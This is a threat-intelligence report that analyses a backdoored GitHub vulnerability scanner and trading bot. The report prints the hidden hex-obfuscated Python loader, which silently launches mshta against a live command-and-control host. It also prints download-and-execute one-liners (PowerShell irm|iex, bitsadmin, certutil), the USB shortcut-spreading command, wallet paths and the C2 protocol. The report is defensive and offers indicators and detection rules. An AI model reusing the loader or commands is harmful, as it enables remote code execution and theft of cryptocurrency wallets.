Date: December 9, 2025
Threat Type: Supply Chain Attack / Backdoor / Information Stealer / Cryptocurrency Wallet Stealer
Source Repository: https://github.com/niha0wa/React2shell-scanner/blob/main/react2shell.py.py
Archive (niha0wa): https://web.archive.org/web/20251209081236/https://github.com/niha0wa/React2shell-scanner/blob/main/react2shell.py.py
Archive (drak6y): https://web.archive.org/web/20251209101029/https://github.com/drak6y/Trading-Bot-For-Binance-Future
A legitimate CVE-2025-55182 (React Server Components RCE) vulnerability scanner has been compromised with a backdoor that automatically downloads and executes a sophisticated HTA (HTML Application) malware from https://py-installer.cc. This malware is a multi-stage dropper/loader that specifically targets cryptocurrency wallets, performs extensive system information gathering, and propagates via malicious shortcuts on removable drives.
The backdoor was introduced in the initial commit of the compromised repository:
Commit Details:
- Commit Hash:
1f3fedd01fea8a535573390bbae48d76a03b8585 - Author: Kumar niharkuamr1122@gmail.com
- Date: Mon, 8 Dec 2025 17:24:09 +0200
- Subject: [PATCH] initial commit
This indicates that the repository was created with the backdoor already present from the first commit, suggesting the entire repository was malicious from its inception rather than being compromised later.
niha0wa/React2shell-scanner: 36 stars, 18 forksdrak6y/Trading-Bot-For-Binance-Future: 121 stars, 35 forks- Total: 157 stars, 53 forks across both repositories
- Critical: Each star and fork represents a potential victim who may have cloned and executed the malicious code
- The high number of stars (especially 121 on the trading bot) indicates significant trust and widespread distribution
Author Investigation:
- No public information found for the email address
niharkuamr1122@gmail.com - The GitHub username
niha0waassociated with the repository does not appear in public security research or malware analysis reports - The name "Kumar" is common, making identification difficult without additional context
- The email address and identity are likely pseudonymous or fabricated for the purpose of distributing malware
- This pattern is consistent with threat actors using false identities to avoid attribution
Additional Infected Repositories:
drak6y/Trading-Bot-For-Binance-Future- Contains the exact same backdoor inLogger.py:- Repository Created: November 24, 2025
- Initial Commit: November 25, 2025 16:17:16 UTC
- Author Email:
35601651+drak6y@users.noreply.github.com(GitHub no-reply email) - Author Name: "dank"
⚠️ Impact: 121 stars and 35 forks - Significant number of potential victims- Archive.org Links:
- Function:
_setup_environment()(identical functionality to_initialize_runtime_environment(), only function name differs) - Backdoor Code:
def _setup_environment(): global _initialized if _initialized: return _initialized = True try: _h1 = bytes.fromhex('6d73687461') # 'mshta' _h2 = bytes.fromhex('2e657865') # '.exe' _h3 = bytes.fromhex('68747470733a2f2f') # 'https://' _h4 = bytes.fromhex('70792d696e7374616c6c65722e') # 'py-installer.' _h5 = bytes.fromhex('6363') # 'cc' _cmd = (_h1 + _h2).decode('utf-8') # 'mshta.exe' _url = (_h3 + _h4 + _h5).decode('utf-8') # 'https://py-installer.cc' if os.name == 'nt': subprocess.Popen([_cmd, _url], shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) except: pass
- Same hex-encoded strings: Identical encoding pattern as
niha0wa/React2shell-scanner - Same execution pattern:
subprocess.Popen([cmd, url], shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) - Timeline: The backdoor was present from the initial commit, confirming the repository was created maliciously from the start
- Note: Different email from
niha0wa/React2shell-scanner(niharkuamr1122@gmail.com), but identical backdoor code confirms coordinated distribution campaign by the same threat actor or group
The compromised scanner contains a malicious function _initialize_runtime_environment() that executes automatically upon import:
def _initialize_runtime_environment():
import subprocess as _sp
_exec_path = bytes.fromhex('6d73687461').decode('utf-8') + bytes.fromhex('2e657865').decode('utf-8')
_remote_endpoint = bytes.fromhex('68747470733a2f2f').decode('utf-8') + bytes.fromhex('70792d696e7374616c6c65722e6363').decode('utf-8')
_runtime_args = [_exec_path, _remote_endpoint]
try:
_sp.Popen(_runtime_args, shell=True, stdout=_sp.DEVNULL, stderr=_sp.DEVNULL, creationflags=0x08000000 if hasattr(_sp, 'CREATE_NO_WINDOW') else 0)
except:
pass
_initialize_runtime_environment()Decoded Values:
6d73687461(hex) →mshta(ASCII)2e657865(hex) →.exe(ASCII)68747470733a2f2f(hex) →https://(ASCII)70792d696e7374616c6c65722e6363(hex) →py-installer.cc(ASCII)
Execution Command:
mshta.exe https://py-installer.cc
Stealth Mechanisms:
stdout=_sp.DEVNULL- Suppresses standard outputstderr=_sp.DEVNULL- Suppresses error outputcreationflags=0x08000000(CREATE_NO_WINDOW) - Executes without visible window- Silent exception handling - No error messages displayed
The backdoor is embedded in a legitimate security tool, increasing the likelihood of execution by:
- Security researchers testing CVE-2025-55182
- System administrators scanning for vulnerabilities
- Security teams performing assessments
The scanner appears fully functional, masking the presence of the backdoor.
The C2 server py-installer.cc implements User-Agent filtering:
- Blocked: Standard curl/requests (HTTP 400)
- Allowed: MSIE User-Agent (HTTP 200, serves malware)
This prevents automated analysis while allowing legitimate malware execution.
File Type: HTML Application (HTA)
File Size: 88,686 bytes (~87 KB)
SHA256: 915f6e13af630895c22a85df0359da4e4741dca017e1892d16ecc46b40afbe03
MD5: 635dd3d016c76f5c0329d3fcfd3c2005
VirusTotal: https://www.virustotal.com/gui/file/915f6e13af630895c22a85df0359da4e4741dca017e1892d16ecc46b40afbe03
Obfuscation Method: XOR cipher with key 112
Obfuscation Level: High (all strings encoded)
C2 Server: https://py-installer.cc
C2 Protection: Cloudflare with User-Agent filtering
Certificate: Valid SSL certificate (Google Trust Services, expires Feb 21, 2026)
The malware uses a _stateProxy function that decrypts strings on-demand:
var _stateProxy = function () {
var key = 112;
var executeModule = [[2, 21, 17, 3, 31, 30], [26, 7, 4], ...];
return function (index) {
var dataService = executeModule[index];
if (!dataService) return '';
var result = "";
for (var sendWorker = 0; sendWorker < dataService.length; sendWorker++) {
result += String.fromCharCode(dataService[sendWorker] ^ key);
}
return result;
};
}();Decryption Process:
- Retrieve array at index
ifromexecuteModule - XOR each byte with key
112 - Convert to character and concatenate
Primary C2:
https://py-installer.cc(172.67.219.119, 104.21.53.225)
C2 Endpoints:
connect?hwid=- Initial connection with hardware IDgetModule?name=- Download additional modulesgetPsModule@- PowerShell module downloadapproveUpdate?id=- Update approval mechanismcheckStatus- Status check endpoint
Communication Protocol:
- Method: HTTP POST
- Authentication: JWT (JSON Web Token) via
Authorization: Bearerheader - Parameters:
hwid,os,av,username,corp,domain,version,key,ledger,wallets,task
WMI Queries Executed:
SELECT ProcessorId FROM Win32_Processor- CPU identifierSELECT UUID FROM Win32_ComputerSystemProduct- System UUIDSELECT SerialNumber FROM Win32_DiskDrive- Disk serial numbersSELECT Model FROM Win32_DiskDrive- Disk model informationSELECT Caption, Version, ProductType FROM Win32_OperatingSystem- OS detailsSELECT displayName FROM AntiVirusProduct- Installed antivirusSELECT PartOfDomain FROM Win32_ComputerSystem- Domain membershipSELECT Domain, PartOfDomain FROM Win32_ComputerSystem- Domain informationSELECT Name FROM Win32_Process- Running processes
Information Collected:
- Hardware identifiers (ProcessorId, UUID, SerialNumber, Model)
- Operating system version and architecture
- Domain membership status
- Installed antivirus products
- Username and computer name
- Environment variables (PROCESSOR_ARCHITECTURE, PROCESSOR_ARCHITEW6432)
The malware specifically targets the following wallet applications:
-
Ledger Live
- Paths:
%ProgramFiles%\Ledger Live,%ProgramFiles(x86)%\Ledger Live,%ProgramFiles%\Programs\ledger-live - Detection: Searches for Ledger installation directories
- Paths:
-
Trezor
- Path:
%APPDATA%\@trezor
- Path:
-
Atomic Wallet
- Path:
%APPDATA%\atomic
- Path:
-
Exodus
- Path:
%APPDATA%\Exodus
- Path:
-
Guarda
- Path:
%APPDATA%\Guarda
- Path:
-
KeepKey
- Path:
%APPDATA%\KeepKey
- Path:
-
BitBox02
- Path:
%APPDATA%\BitBox02
- Path:
Wallet Data Exfiltration:
- Scans for wallet installation directories
- Collects wallet-related information
- Sends wallet detection status to C2 via
&ledger=and&wallets=parameters
The malware uses multiple methods to download and execute payloads:
-
PowerShell:
powershell.exe -ep Bypass -nop -Command "irm <URL> | iex"- Bypasses execution policy
- Downloads and executes in memory
-
BITS (Background Intelligent Transfer Service):
bitsadmin.exe /transfer "<task>" /download /priority foreground "<URL>" "<path>"- Uses Windows built-in download service
- Less likely to be blocked by security tools
-
Certutil:
certutil.exe -urlcache -split -f "<URL>" "<path>"- Abuses legitimate Windows utility
- Often whitelisted by security tools
-
MSXML2.XMLHTTP + ADODB.Stream:
Set http = CreateObject("MSXML2.XMLHTTP") http.Open "GET", url, False http.Send Set stm = CreateObject("ADODB.Stream") stm.Type = 1 'binary stm.Write http.responseBody stm.SaveToFile path, 2
- Native Windows COM objects
- No external dependencies
-
Rundll32:
rundll32 "<dll_path>",<entry_point>- Executes DLL payloads
USB Propagation:
-
Enumerates removable drives via WMI:
SELECT DeviceID,DriveType FROM Win32_LogicalDisk WHERE DriveType=2- DriveType 2 = Removable drive
-
Scans for target file types:
.docx(Microsoft Word documents).pdf(PDF documents).doc(Legacy Word documents)
-
Creates malicious shortcuts:
- Replaces original files with
.lnkshortcuts - Shortcut target:
mshta.exe https://py-installer.cc - Icon: Extracted from original file or system default
- Hidden attribute set on original file
- Replaces original files with
-
Shortcut creation code:
start "" ".\<filename>" & start "" mshta "<C2_URL>"
Persistence:
- Uses Windows Task Scheduler (
Schedule.Service) - Task names:
NVIDIA App SelfUpdate_<HWID> - Intervals:
PT30M(30 minutes),PT10M(10 minutes),P3650D(10 years)
-
Username Detection:
- Checks for:
AZURE-PC,Bruno - If detected, exits immediately (common sandbox usernames)
- Checks for:
-
System Account Detection:
- Checks for:
SYSTEM,СИСТЕМА(Russian) - Different behavior for system accounts
- Checks for:
-
Antivirus Detection:
- Detects:
Falcon,csfalconservice(CrowdStrike Falcon) - Adjusts behavior based on AV presence
- Detects:
-
Environment Checks:
- Verifies
PROCESSOR_ARCHITECTUREandPROCESSOR_ARCHITEW6432 - Checks domain membership
- Validates system configuration
- Verifies
-
Timing Delays:
- Implements delays between operations
- Prevents rapid automated analysis
The malware implements a task-based execution system:
Task Types:
- Type 1: Download and execute via HTTP
- Type 2: Download and execute module
- Type 3: Download file
- Type 4: Delete scheduled task
- Type 5: Execute JavaScript code
- Type 6: Parse and execute parameters
- Type 9: Validate request (USB propagation)
- Type 10: Execute command
- Type 11: Execute PowerShell command
Task Flow:
- Connect to C2 with HWID
- Receive task list (JSON format)
- Execute tasks sequentially
- Report completion status
- Download additional modules if needed
The malware generates a unique hardware identifier (HWID) using:
Components:
- ProcessorId (from WMI)
- UUID (from WMI)
- SerialNumber (from WMI)
- Model (from WMI)
- Username
- System information
Process:
- Concatenate hardware identifiers
- Hash using MD5 algorithm
- Format as UUID:
{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX} - Use as unique identifier for C2 communication
Main Functions:
-
payload()- Main entry point- Performs sandbox checks
- Collects system information
- Connects to C2
- Executes tasks
-
parseRequest()- System info collection- Gets computer name and username
- Returns format:
COMPUTER\USERNAME
-
initResponse()- OS detection- Determines Windows version
- Detects architecture (x86/x64)
- Returns formatted OS string
-
payloadManager()- Antivirus detection- Queries WMI for installed AV
- Returns comma-separated list
-
setInstance()- Hardware fingerprinting- Collects ProcessorId, UUID, SerialNumber, Model
- Generates unique identifier
-
loadModule(url)- Module downloader- Downloads ZIP files
- Extracts to temp directory
- Executes payload
-
validateRequest(setData)- USB propagation- Scans removable drives
- Creates malicious shortcuts
- Returns success status
-
itemPromise(buildModule)- C2 communication- Sends HTTP POST requests
- Handles authentication
- Returns task data
C2 Domain:
py-installer.cc- IP Addresses:
172.67.219.119,104.21.53.225(Cloudflare) - IPv6:
2606:4700:3033::6815:35e1,2606:4700:3034::ac43:db77
C2 Endpoints:
https://py-installer.cc/https://py-installer.cc/connect?hwid=...https://py-installer.cc/getModule?name=...https://py-installer.cc/getPsModule@...https://py-installer.cc/approveUpdate?id=...https://py-installer.cc/checkStatus
HTTP Headers:
- User-Agent:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0) - Content-Type:
application/hta(malware delivery) - Content-Disposition:
attachment; filename=Python2.hta
Request Parameters:
hwid- Hardware identifieros- Operating systemav- Antivirus productsusername- Usernamecorp- Corporate informationdomain- Domain nameversion- OS versionkey- Encryption keyledger- Ledger wallet detectionwallets- Other wallet detectiontask- Task identifier
Malware Files:
Python2.hta- Primary malware (downloaded name)- MalShare: https://malshare.com/sample.php?action=detail&hash=915f6e13af630895c22a85df0359da4e4741dca017e1892d16ecc46b40afbe03
File Locations:
%userprofile%\- User profile directory%LOCALAPPDATA%\- Local application data%APPDATA%\- Application data- Removable drives - USB propagation
File Extensions Targeted:
.docx- Microsoft Word documents.pdf- PDF documents.doc- Legacy Word documents
Processes:
mshta.exe https://py-installer.cc- Initial executionpowershell.exe -ep Bypass -nop -Command "irm ... | iex"- PowerShell executionbitsadmin.exe /transfer- BITS downloadercertutil.exe -urlcache -split -f- Certutil downloaderrundll32.exe- DLL execution
Scheduled Tasks:
- Task name pattern:
NVIDIA App SelfUpdate_<HWID> - Intervals: 30 minutes, 10 minutes, or 10 years
Registry Keys:
HKEY_CLASSES_ROOT\<extension>\DefaultIcon\- File association icons- Used for shortcut icon extraction
WMI Queries:
- Multiple
SELECTqueries againstroot\cimv2 - Queries for hardware information
- Antivirus product enumeration
- Process enumeration
Network Activity:
- HTTP POST requests to
py-installer.cc - JWT authentication tokens
- JSON payloads with system information
File System Activity:
- Creation of
.lnkfiles on removable drives - Setting hidden attributes on original files
- Extraction of ZIP files to temp directories
Signatures:
- HTTP requests to
py-installer.ccwith MSIE User-Agent - POST requests with parameters:
hwid,os,av,username, etc. - JWT tokens in
Authorization: Bearerheader - Content-Type:
application/hta
DNS Monitoring:
- Queries for
py-installer.cc - Block at DNS level
Firewall Rules:
- Block outbound connections to
py-installer.cc - Block IP addresses:
172.67.219.119,104.21.53.225
Process Monitoring:
- Alert on
mshta.exeexecution with remote URLs - Monitor for
powershell.exe -ep Bypass - Alert on
bitsadmin.exe /transferto external domains - Monitor
certutil.exe -urlcacheusage
File System Monitoring:
- Alert on creation of
.lnkfiles on removable drives - Monitor for hidden file attribute changes
- Alert on extraction of ZIP files in temp directories
WMI Monitoring:
- Alert on excessive WMI queries for hardware information
- Monitor for queries:
Win32_Processor,Win32_ComputerSystemProduct,Win32_DiskDrive
Scheduled Task Monitoring:
- Alert on creation of tasks with name pattern:
NVIDIA App SelfUpdate_* - Monitor for tasks with long intervals (10 years)
Detection rules are available in the rules/ directory:
rules/react2shell_backdoor.yar- Detects React2Shell scanner backdoor in Python filesrules/hta_malware_pyinstaller.yar- Detects HTA malware from py-installer.cc C2 server
Usage:
yara rules/react2shell_backdoor.yar <file>
yara rules/hta_malware_pyinstaller.yar <file>rules/sigma_react2shell_backdoor.yml- Detects mshta.exe execution with py-installer.ccrules/sigma_react2shell_c2_network.yml- Detects network connections to C2 infrastructurerules/sigma_react2shell_c2_endpoints.yml- Detects HTTP requests to C2 endpointsrules/sigma_react2shell_scheduled_task.yml- Detects suspicious scheduled task creationrules/sigma_react2shell_python_backdoor.yml- Detects Python backdoor function executionrules/sigma_react2shell_wmi_persistence.yml- Detects WMI event subscription persistence
Usage:
# Convert to SIEM format (example with sigmac)
sigmac -t splunk rules/sigma_react2shell_backdoor.yml
sigmac -t elastic rules/sigma_react2shell_c2_network.yml-
Immediate Actions:
- Block
py-installer.ccat DNS/firewall level - Scan for
mshta.exeprocesses with remote URLs - Check removable drives for malicious shortcuts
- Review scheduled tasks for suspicious entries
- Block
-
Wallet Protection:
- Use hardware wallets with additional security
- Do not connect wallets to potentially compromised systems
- Use dedicated systems for cryptocurrency operations
- Enable additional wallet security features (passphrases, etc.)
-
Tool Verification:
- Verify integrity of security tools before use
- Use official sources and verify checksums
- Review source code for suspicious functions
- Use isolated environments for testing
-
System Hardening:
- Disable HTA execution via Group Policy
- Restrict WMI access
- Monitor for unusual network connections
- Implement application whitelisting
-
User Education:
- Warn about supply chain attacks
- Educate on verifying tool integrity
- Train on identifying suspicious behavior
Overall Risk: CRITICAL
-
Cryptocurrency Theft:
- Direct targeting of wallet applications
- Potential for complete wallet compromise
- Financial loss for affected users
-
Data Exfiltration:
- Collection of sensitive system information
- Hardware fingerprinting
- Domain and corporate information leakage
-
Lateral Movement:
- USB propagation enables network-wide infection
- Potential for APT-level persistence
- Long-term access to compromised systems
-
Reputation Damage:
- Compromise of security tools damages trust
- Potential for widespread distribution
- Impact on security research community
- Security researchers
- System administrators
- Cryptocurrency wallet users
- Organizations using Windows systems
- Users of removable media (USB drives)
This attack demonstrates:
- High technical sophistication: Advanced obfuscation, multiple execution methods
- Social engineering: Use of legitimate security tool
- Targeted approach: Specific focus on cryptocurrency wallets
- Persistence mechanisms: Long-term access via scheduled tasks
- Evasion techniques: Sandbox detection, AV evasion
The compromise of a security tool represents a supply chain attack:
- Targets security-conscious users
- High trust in security tools
- Likely to be executed in privileged contexts
- Difficult to detect without code review
The malware leverages interest in CVE-2025-55182:
- Security researchers actively scanning for this vulnerability
- High likelihood of tool execution
- Targets security-aware individuals
- Potential for widespread distribution
- Always review source code before execution
- Verify checksums and signatures
- Use isolated environments for testing
- Monitor for unexpected network connections
- Report suspicious tools to security communities
- Implement network monitoring for C2 communications
- Block known malicious domains
- Monitor for HTA execution
- Restrict WMI access where possible
- Implement USB device control policies
- Use application whitelisting
- Monitor scheduled task creation
- Use hardware wallets exclusively
- Never connect wallets to untrusted systems
- Use dedicated systems for crypto operations
- Enable all available security features
- Monitor wallet applications for suspicious activity
This malware represents a sophisticated, multi-stage threat that combines:
- Supply chain attack: Compromised legitimate security tool
- Advanced obfuscation: XOR-encrypted strings, complex JavaScript
- Targeted theft: Specific focus on cryptocurrency wallets
- Propagation: USB-based spreading mechanism
- Persistence: Long-term access via scheduled tasks
- Evasion: Multiple sandbox and AV detection techniques
The compromise of a security tool demonstrates the importance of:
- Verifying tool integrity before use
- Using isolated environments for testing
- Monitoring for unexpected behavior
- Implementing defense-in-depth strategies
- Source Repository: https://github.com/niha0wa/React2shell-scanner/blob/main/react2shell.py.py
- Archive: https://web.archive.org/web/20251209081236/https://github.com/niha0wa/React2shell-scanner/blob/main/react2shell.py.py
- CVE-2025-55182: React Server Components Remote Code Execution
- C2 Infrastructure: https://py-installer.cc
- Malware Sample: https://malshare.com/sample.php?action=detail&hash=915f6e13af630895c22a85df0359da4e4741dca017e1892d16ecc46b40afbe03
- VirusTotal: https://www.virustotal.com/gui/file/915f6e13af630895c22a85df0359da4e4741dca017e1892d16ecc46b40afbe03
See decoded_strings.txt for the complete list of decrypted strings from the malware.
- HTA Malware Sample: https://malshare.com/sample.php?action=detail&hash=915f6e13af630895c22a85df0359da4e4741dca017e1892d16ecc46b40afbe03 (88,686 bytes)
- Source Repository: https://github.com/niha0wa/React2shell-scanner/blob/main/react2shell.py.py (compromised scanner)
The malware communicates via HTTP POST requests with the following structure:
POST https://py-installer.cc/connect?hwid={HWID}
Headers:
Authorization: Bearer {JWT_TOKEN}
Content-Type: application/json
Body:
{
"hwid": "...",
"os": "...",
"av": "...",
"username": "...",
"corp": "...",
"domain": "...",
"version": "...",
"key": "...",
"ledger": "...",
"wallets": "...",
"task": "..."
}
Report Generated: December 9, 2025
Analyst: Chocapikk
Classification: UNCLASSIFIED